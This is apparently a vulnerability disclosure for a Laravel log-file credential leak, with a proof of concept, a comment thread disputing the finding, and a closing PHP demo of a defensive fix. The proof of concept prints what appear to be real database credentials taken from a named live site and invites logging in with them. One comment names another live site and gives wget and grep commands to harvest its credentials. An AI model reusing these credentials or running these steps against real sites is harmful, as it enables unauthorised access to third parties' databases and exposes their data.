CVE-ID: CVE-2024-29291
Description:
A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials.
Additional Information:
None.
Risk:
High.
Vulnerability Type:
Database credential leak vulnerability.
Vendor of Product:
Laravel Framework.
Affected Product Code Base:
Laravel Framework - 8.* - 11.*
Affected Component:
laravel.log.
Attack Type:
Remote.
Impact Information Disclosure:
True.
Attack Vectors:
Database credential leak vulnerability.
Description:
Access to private database credential data is possible by logging into the website database. Additionally, login data for database access can be retrieved.
Proof of concept:
Go to any Laravel-based website and navigate to storage/logs/laravel.log.
Open the file and search for "PDO->__construct('mysql:host=".
The result:
```shell
#0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
#1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
```
Credentials:
Username: u429384055_jscv
Password: Jaly$$a0p0p0p0
Host: sql1...
Now you can login to the database.
By: Huseein Amer
Facebook: https://www.facebook.com/hussein.amer.75491/
This only works in misconfigured apps, right? /storage should be symlinked to /storage/app/public when using php artisan storage:link.
The problem lies in the laravel.log file, where the system stores the login data in the log file
If you can navigate to storage/logs/laravel.log you can just as well do cat .env.
Also, turn off debug mode please.
To anyone reading this: This does not deserve a CVE. Don't waste your time.
This is a misconception based on a deployment error. The app should have been in prod logging mode with a loglevel higher than debug AND the /public folder should have been the root of the web path so that storage/logs was never accessible in the first place. If storage/logs is accessible, so is .env, config/ and vendor/.
Mr Jelle-SamsonIT,
Connection data can be displayed even if the .env file cannot be read by an attacker. It is enough just to have the ability to read the log file.
As on the site https://www.digo.sa/.env: it shows you a 403 Forbidden and cannot display data from the env file.
Go to https://www.digo.sa/storage/logs/laravel.log and write it down:
wget https://www.digo.sa/storage/logs/laravel.log
and
grep host laravel.log
and you can now show
'mysql:host=127....', 'africansc_afric...', 'TYumh2rsJ0WP7Qe...'
As for the eligibility to grant a CVE, mitre.org has classified it as high risk.
Read this documentation: https://laravel.com/docs/11.x/filesystem#the-public-disk
It says: "The public disk included in your application's filesystems configuration file is intended for files that are going to be publicly accessible. By default, the public disk uses the local driver and stores its files in storage/app/public."
Thus storage/logs should not be accessible.
The Connector class could make use of the SensitiveParameter attribute. Seems appropriate.
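As an added example (not code from the gist or from Laravel), the PHP 8.2+ script below shows why a failed connection attempt copies the password into the exception trace that ends up in laravel.log, and how the #[\SensitiveParameter] attribute suggested above keeps it out; the LeakyConnector and SafeConnector classes and the password value are constructed for the demonstration.

```php
<?php
// Added example, not from the gist or Laravel. A failed "connection" throws,
// and the password passed to connect() lands in the exception trace, exactly
// like the PDO->__construct(...) lines in the laravel.log excerpt above.
// Requires PHP 8.2+ for #[\SensitiveParameter].

final class LeakyConnector
{
    public function connect(string $dsn, string $user, string $password): void
    {
        // Stands in for the PDO constructor failing (wrong host, bad password, ...).
        throw new RuntimeException("could not connect to $dsn");
    }
}

final class SafeConnector
{
    // Marking the parameter makes PHP replace its value in backtraces
    // with an opaque SensitiveParameterValue object.
    public function connect(string $dsn, string $user, #[\SensitiveParameter] string $password): void
    {
        throw new RuntimeException("could not connect to $dsn");
    }
}

/** Run $fn, catch the failure and return the trace text a logger would write. */
function traceFor(callable $fn): string
{
    try {
        $fn();
    } catch (RuntimeException $e) {
        return $e->getTraceAsString();
    }
    return '';
}

$password = 'hunter2-secret'; // constructed sample value, not a real credential

$leaky = traceFor(fn () => (new LeakyConnector())->connect('mysql:host=db', 'app', $password));
$safe  = traceFor(fn () => (new SafeConnector())->connect('mysql:host=db', 'app', $password));

printf("leaky trace contains password: %s\n", var_export(str_contains($leaky, $password), true));
printf("safe trace contains password:  %s\n", var_export(str_contains($safe, $password), true));
printf("safe trace shows placeholder:  %s\n", var_export(str_contains($safe, 'SensitiveParameterValue'), true));

// Independent of the attribute, zend.exception_ignore_args=On (the php.ini-production
// default) drops every argument value from traces; the two controls can be combined.
```

Neither control replaces the deployment fixes discussed above (web root at /public, non-debug log level in production); they only limit what a trace reveals if a log does leak.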